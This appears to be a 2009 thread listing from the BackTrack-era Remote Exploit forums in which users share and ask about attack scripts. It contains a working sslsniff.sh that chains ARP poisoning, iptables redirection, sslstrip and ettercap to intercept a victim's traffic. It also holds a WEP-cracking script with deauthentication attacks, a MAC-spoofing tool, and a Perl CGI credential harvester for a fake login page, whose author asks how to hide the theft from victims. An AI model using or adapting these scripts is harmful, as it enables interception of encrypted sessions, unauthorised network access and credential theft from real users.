Remote Exploit Forums - Programming

shell script to change MAC address

thims — Sat, 14 Nov 2009 13:57:46 GMT

While I am at it figured I would post this little snippet aswell.
I do realize there are other utilities to spoof the MAC address of devices, but I would rather us my own solution. (plus I was bored).

General Usage:
-h print help
-s generate random mac address and assign it
-u set mac address to what it was from the beginning

ToDo:
- add CLI flag to define interface
- add CLI flag to manually define mac address
- resolve issue with assigning the MAC, ifconfig has issues with certain mac address's not sure why yet.

Download: mediafire.com/download.php?hean10e25zi
Code:

Code:

#!/bin/bash

#

# Synopsis: MAC address spoofing utility

# Author:                thims (thims DOT local AT gmail DOT com)

# Version:  0.1

# Date:                        20091104

# Comments: 

# ToDo:

#                                - figure out why certain MAC addresss cause ifconfig to exit with error (Error: could not set spoofed MAC address, possibly try running againg)





# Editable variables

iface=wlan0                                                                                                                        #desired interface

origMAC=ff:ff:ff:ff:ff:ff                                                                #original MAC address





### Code Begins ###

spfMAC=

alph=(0 1 2 3 4 5 6 7 8 9 A B C D E F)

alph_len=${#alph[*]}





function help() {

cat << EOF

Usage: $0 [args]

    -h, --help     -  Print this help and exit

    -s, --spoof    -  Spoof MAC address to a randomly generated address

    -u, --unspoof  -  Return spoofed MAC address to original MAC address

EOF

}



function die() {

        if [ -n "$1" ] ;then

                echo "$1"

        fi

        exit 1

}



function genMAC() {

        for i in $(seq 6) 

        do

                for x in $(seq 2) 

                do

                        spfMAC=${spfMAC}${alph[$((RANDOM % alph_len))]}

                done

                spfMAC=${spfMAC}:

        done

        spfMAC=${spfMAC:0:17}

}



function changeIface() {

        MAC="$1"

        

        ifconfig $iface &> /dev/null

        if [ $? -gt 0 ] ;then

                die "Error: IFACE $iface does not exist(possibly down?)"

        fi





        ifconfig $iface down

        ifconfig $iface inet hw ether $MAC up &> /dev/null

        # the following if is in place because ifconfig was being picky about certain MAC addresss

        if [ $? -gt 0 ] ;then

                die "Error: could not set spoofed MAC address, possibly try running againg"

        fi

}





if [ $UID -gt 0 ] ;then

        die "Error: Sorry dude, gotta be root!"

fi



while [ $# -gt 0 ] 

do

        case "$1" in

                "-h"|"--help")

                        help

                        die

                ;;

                "-s"|"--spoof")

                        genMAC

                        changeIface $spfMAC

                ;;

                "-u"|"--unspoof")

                        changeIface $origMAC

                ;;

                *)

                        help

                        die

                ;;

        esac

        shift

done

All feeback welcome, I would love to hear your thoughts.

sslsniff.sh

thims — Sat, 14 Nov 2009 13:47:29 GMT

@admins if you feel this is a duplicate post let me know and delete it I will move back to where this originated, but seeing as revisions, etc. I didnt want to hijack the original post.

This script is not intended for illegitimate uses, I am in no way responsible for the way you use this, or the decisions you make.

This is a script I wrote for SSL sniffing.
ToDO:
- ensure ip_forward is always set

General Usage:
./sslsniff.sh -v -g
-v and -g are the only required flags, the rest are optional.
if -s is not specified sslstrip defaults to port 10000
-h for help

Download: mediafire.com/?nmtz2tjvuyj
Code:

Code:

#!/bin/bash

#

# Synopsis:        A program to sniff traffic in an SSL connection

# Author:                thims (thims DOT local AT gmail DOT com)

# Version:        0.3

# Date:                        20091107

# Comments:        

#                ToDO:





# leave blank simply here for coding style

victim=

gateway=

sslPort=10000

etterConf=/etc/etter.conf



# print help

function help() {

cat << EOF

Usage: $0 [args] host

    -h, --help     -  Print this help and exit

    -i. --iface    -  Interface to use

    -e, --etconf   -  Location of etter.conf on the filesystem

    -v, --victim   -  IP address of desired host

    -g, --gateway  -  IP address of network gateway

    -s, --sslport  -  Desired port for sslstrip

EOF

}



# echo supplied argument and die

function die() {

        if [ -n "$1" ] ;then

                echo "$1"

        fi

        exit 1

}



# nohup wrapper to check if specified program will execute correctly

function noHup() {

        cmd="$1"

        nohup $cmd > /dev/null &> /dev/null &

        sleep 5

        # here simply to handle sslstrip because it is ran by python it throws off pidof

        if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then

                pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')

        else

                pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))

        fi



        if [ -z "$pid" ] ;then

                return 1

        else

                return 0

        fi

}



# poison the arp

function spoofMac() {

        echo -n "Poisoning the victim...."

        noHup "arpspoof "$iface" -t "$victim" "$gateway""

        if [ $? -gt 0 ] ;then

                die "Error: could not initiate arpspoof. Dieing..."

        fi

        echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run

        echo "Ok"

}



# intercept the SSL cert

function sslInit() {

        echo -n "Setting up SSL intercept...."

        echo 1 > /proc/sys/net/ipv4/ip_forward

        # ensure that ip_forward is set

        while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]

        do

                echo 1 > /proc/sys/net/ipv4/ip_forward

        done



        iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"

        noHup "sslstrip -a -f -k -l "$sslPort""

        if [ $? -gt 0 ] ;then

                die "Error: could not initiate sslstrip. Dieing..."

        fi

        echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run

        echo "Ok"

}



# capture the responses

function capture() {

        # edit ettercap.conf

        for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')

        do

                sed -i $linNum's/#//' "$etterConf"

        done



        echo -n "Starting to sniff...."

        ettercap -T -q "$iface"

}



# clean up enviroment

function cleanUp() {

        echo "Cleaning up...."

        echo -n "Closing SSL proxy...."

        kill $(cat /var/run/sslsniff.sslstrip.run)

        rm /var/run/sslsniff.sslstrip.run

        echo "Ok"

        echo -n "Unpoisoning the victim...."

        kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)

        rm /var/run/sslsniff.arpspoof.run

        echo "Ok"

        echo -n "Removing iptables rule and ip_forwarding...."

        iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"        

        echo 0 > /proc/sys/net/ipv4/ip_forward

        echo "Ok"

        

        # return etter.conf to the state it was found in 

        echo -n "Returning etter.conf to the configuration we found it with...."

        for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')

        do

                sed -i $linNum's/^/#/' "$etterConf"

        done

        echo "Ok"

        echo "Have a nice day!"

}



# initialize the whole shebang

function initialize() {

  if [ -z "$victim" ] || [ -z "$gateway" ] ;then

    help

    echo

    die "Error: a syntactical one"

        else

                echo "Enviroment details:"

                echo "    Victim:         " "$victim" "  Ok!"

                echo "    Gateway/Router: " "$gateway" "  OK!"

                echo "    Interface:      " "$iface" "  OK!"

                echo "    SSLStrip port:  "        "$sslPort" "  OK!"



    spoofMac

    sslInit

    capture

                cleanUp

  fi  

}





# some CLI ARGS?

while [ $# -gt 0 ]

do

        case "$1" in

                "-h"|"--help")

                        help

                        die

                ;;

                "-v"|"--victim")

                        victim="$2"

                ;;

                "-g"|"--gw")

                        gateway="$2"

                ;;

                "-s"|"--sslport")

                        sslPort="$2"

                ;;

                "-i"|"--iface")

                        if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then

                                die "Error: interface "$2" does not exist!"

                        else

                                iface="-i $2"

                        fi

                ;;

                "-e"|"--etconf")

                        if [ ! -e "$2" ] ;then

                                die "Error: specified ettercap conf does not exist!"

                        else

                                etterConf="$2"

                        fi

                ;;

                '')

                        help

                        echo

                        die "Error: a syntactical one"

                ;;

                -*)

                        help

                        echo

                        die "Error: a syntactical one"

                ;;

        esac

        shift

done





# main loop

initialize

All suggestions, comments, feedback, etc are more then welcome, I would love to hear what you thoughts are.

Also I take suggestions/requests for scripts.

Validating user input in bash.

Nick_the_Greek — Wed, 04 Nov 2009 21:46:19 GMT

Hi community

I am doing some experimentations in bash script. Learning from various sites. The last time that I do programming was since Locomotive Basic.(Remember Amstard 6128 ?)

I can find out a better way to validate user's inputs with read command.(please see below). I am trying to accept only those inputs from users that are meet some criteria.

Like:
read WEP keys --> accept only (5 or 13 ascii) or (10 or 26 hex)

I found a way and a really don't think is the correct one because it is "command specific". With that I mean that I use the errors from a specific command (in my case iwconfig) to see if that input (key xxxx..) that I get from the user, fits to the command.

Code:

 #!/bin/bash



clear

echo -n "WEP Key: ?"



while read key; do

     if [ -z "${key}" ]; then

        clear  

        echo "That was empty, do it again!"

        echo -n "WEP Key: ?"

     else

          echo "Checking now..."

          break

     fi

done



iwconfig wlan0 key $key >/dev/null 2>&1



if [ $? != 0 ]; then

        echo "Your key is `echo ${#key}` characters long"

        echo "It should be : a) 10 or 26 ASCII characters long"

        echo "          or : b) 5 or 13 HEX characters long" 

else

        echo "Valid key"

fi

I don't want to use the above, since with that I must have a wireless interface up. And if I got one then that he will use that key before I wanted to. After all there are cases that there aren't commands to validate user's inputs.

Can you suggest me a better way to validate user inputs?

Thank you in advanced.

Nick

sourceguardian files decryption

Chobin73 — Wed, 04 Nov 2009 18:33:55 GMT

So, here i'm back after a long time away...
I dont really know it this is the right place to post my problem, but i haven't found a better subforum to post in, so..
First of all: yes, i've googled around a lot...and yes, i've tried to search within all of the available topics with no success.. :(
I explain my problem: a lawyer friend of mine called me last thursday offering me what he called a "small job". A company had opened a trial against a french programmer who tried to phisically steal one of their web servers, running a custom php application he made for the company itself. The lawyer is defending the company. They already won the first trial, therefore the french bailiffs (hope the term is right, i've googled for it..) went at the programmer's laboratory, they retrieved the webserver and they gave it to the owner (the company). Unfortunately, when the IT dept of the company tried to make some updates on the server, they discovered that the programmer made a complete encryption of all of the php source files using a freeware version of Sourceguardian 7.
The company has paid a regular invoice for the overall webserver, including all of the php programs, and the agreement between them and the programmer clearly stated that all of the necessary sourcefiles would become a company property after payment.
Now the bad part of all: they asked me to help them to decode the sourcefiles because they have big problems in order to rearrange all of their pictures db's. The company is a photographic agency working for some of the main italian newspapers and TV's, therefore their db contains about 50.000.000 pictures, all of them indexed and categorized on a mysql db whose access is managed by the damn php application which integrates another tricky "don't-know-well-what" fast indexer.
I already suggested them to call in another programmer and build another website from scrap. They will...but, unfortunately, since the pictures in the db are identified only by codenames, they cannot rearrange all of the categories because the "rosetta stone" of all of the file naming is encrypted toghether in one of the encrypted php sourcefiles...
This is the bad part.
Now the worst part: the first thing i tried was google in order to find if a sourceguardian cracker was already available somewhere..obviously with no success, otherwise i would not have been here asking for help.
I then analyzed how this encoder works and i discovered the following things:
1)The encryption should be reversible, since no key is required in order to encrypt a file and the encrypted code can be run on any server after installing in it a standard decryption extension on the apache/php engine. The extension is installed as a unique file which must be placed in the webserver's root under an "ixed" folder.
2) The encrypted file cannot be modified in any way: the header of the php document is in clear and contains a series of "if" statements in order to check if the necessary ixed files are installed on the servers: if everything is okay, then a call to sg_load() is made with an encoded string as argument. The encoded string contains the original php source plus a checksum of the overall php file, therefore the decoding extension does not decrypts the string if the file calling the decoding funcion is modified, thus avoiding a simple echo() of the function to print on the screen the decoded mess..
3)I've found a company (xxx.qinvent.com) which says that they can decode every sourceguardian file, but the customer does not trusts them because it's a chinese company, therefore they dont want to send them all of their sources... :confused:
4) Sourceguardian itself has already been called in and they declared that they will not decode the files because of their policy.
I've tried (with no success at all) to:
-debug the encoded files using netbeans but the function result is never displayed.
-coredump the apache/php engine in order to check if the decoded source is passed to the php engine in order to be executed
-perform some standard decoding (base64 and other) on the encoded string
no success at all.
I do know that everything sounds sick, but believe it or not, this is the situation..
Unfortunately, i'm not even a good programmer at all, therefore i'm not able to build a tool capable of sniffing the IPC between the php and apache, nor any eventual leak between php and the decoding extension.
Moreover, i do not really understand well how php works: i do know it's an interpreted language, but (as far as i've understood) it's possible to submit a php application as a bytecode directly to the engine, very much like java works...
Now i'm here asking for help...If someone could even only give me a suggestion of something else that i could try, or if someone has already done something similar and wants to give me a hand, i would really appreciate it.

Thanks a lot in advance.

..hoping this will not end in the idiot's corner for some reason...

scapy bluetooth

valerio — Mon, 02 Nov 2009 15:57:44 GMT

hi *,
i have a problem to forge a l2cap packet with scapy,
someone can show me an example of use srbt() ?

thanks and sorry for my bad english

ruby scipts plz

vvpalin — Sat, 31 Oct 2009 03:04:23 GMT

I'm trying to pick up ruby as the title says, been going pretty good so far but im finding a complete lack of anything security related other than msf and dradis. so...

Any of you happen to know of a decent site, or a couple scripts i can use as reference. I just learn better by doing, and writing "Hi im john, and 10+10=20" scripts is pointless.

Thanks

semi auto WEP with station script....need advice..

mael4704 — Fri, 30 Oct 2009 07:22:29 GMT

hi. 1st sorry about my english, i'm asian

(fresh bt4 vm + edimark 7318usg)
my script like:-

Code:

#!/bin/bash

device=wlan0

driver=rt73usb

fake=00:11:22:33:44:55

enc=1



airmon-ng stop $device

ifconfig $device down

rmmod $driver

modprobe $driver

macchanger --mac 00:11:22:33:44:55 $device

iwconfig $device mode monitor

ifconfig $device up

airmon-ng start $device

airmon-ng stop mon0

sudo rm *.txt

sudo rm *.cap

sudo rm *.sh~

sudo rm *.arp-request

sudo rm *.ivs

sudo rm *.xor

sudo rm *.csv

clear



echo ""

echo "      ___________________________________________________  "

echo "     |                                                   | "

echo "     | chose your target, write down the ESSID,BSSID,ENC | "

echo "     | CH,and STATION. Once done close 'MONITOR' konsole | "

echo "     | and follow the instruction... have a nice day :-) | "

echo "     |___________________________________________________| "

echo ""



   konsole -T MONITOR --noclose -e airodump-ng $device



echo ""

read -p  "  A. CHANNEL (CH).......................?  " ch

read -p  "  B. ESSID..............................?  " essid

read -p  "  C. BSSID   xx:xx:xx:xx:xx:xx .........?  " bssid

read -p  "  D. STATION xx:xx:xx:xx:xx:xx .........?  " station

echo ""



if [ $enc = 1 ]

then

airmon-ng start $device $ch

airmon-ng stop mon0



iwconfig $device rate 1M



 konsole -T table-A --noclose -e airodump-ng -c $ch --write key --bssid $bssid $device &

sleep 3

 konsole -T table-B --noclose -e aireplay-ng -1 6000 -q 10 -o 1 -a $bssid -e $essid -h $fake $device &

sleep 10

 konsole -T table-C --noclose -e aireplay-ng -3 -b $bssid -e $essid -h $fake $device &

sleep 10

konsole -T table-FLASH -e aireplay-ng -0 50 -a $bssid -c $station -h $fake $device &

sleep 15

clear

echo "    please wait.........   "

echo "    do not close any konsole until you got thr password at table-D  "

sleep 30

        konsole -T table-D -e aircrack-ng key-01.cap

clear

echo ""

echo "  :-) "

exit

fi

any advice how to change to fully auto, mean
i dont want write down the input..just want chose the AP and client mac on the list
like

Code:

     choose your AP target



          esssid        enc

      a. aztech1       (wep)   1

      b. aztech2       (wpa)   2

      c. aztech3       (opn)   3





     chose your client



          essid       station

          aztech1     xx:xx:xx:xx:xx:xx   1

                      xx:xx:xx:xx:xx:xx   2

                      xx:xx:xx:xx:Xx:xx   3

then script auto run.
my imagine is
save any data when "MONITOR" run and recall back the data when "MONITOR" closed, how to make this script hapend..

cgi script

killadaninja — Thu, 29 Oct 2009 16:56:53 GMT

Okay, So Ive setup air snarf in the lab, im using ettercap to Spoof the dns, I have modified a fake replica page where the login action invokes the cgi script below, the login, is saved and all works fine, my question is instead of serving up the said, cgi page with the example message "sorry our server is down for mantainence" how would we go about using the information from stdin, to refer and log the victim into their account whilst still recording the data to passwords.txt, so instead of the stealing the victims login, and printing a suspicious sorry our servers are down message, the victims logins should be stolen but the victim should also be signed into his account, none the wiser of what just happened,

so a quick overview, the user presses login on the fake replica page, the cgi/html script is executed his info is stored to passwords.txt but he is also then logged in, without seeing any of this happen.

CURRENT CGI SCRIPT

#!perl
# chmod +x this file and stick it in your cgi-bin directory

# CHANGE THESE VARIABLES $page_title $page_message $page_image
$page_title = "BUSY SERVERS";
$page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
$page_image = "SERVER.jpg";

print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
print "$page_title";
print "";
print "

";
print "$page_message

\n";
print "";

Here is an example of what password.txt looks like

url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0

this is what the script needs to something like, excuse this pathetic attempt

#!perl
# chmod +x this file and stick it in your cgi-bin directory

print "Content-type:text/html\n\n";

read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user

Thanks in advanced.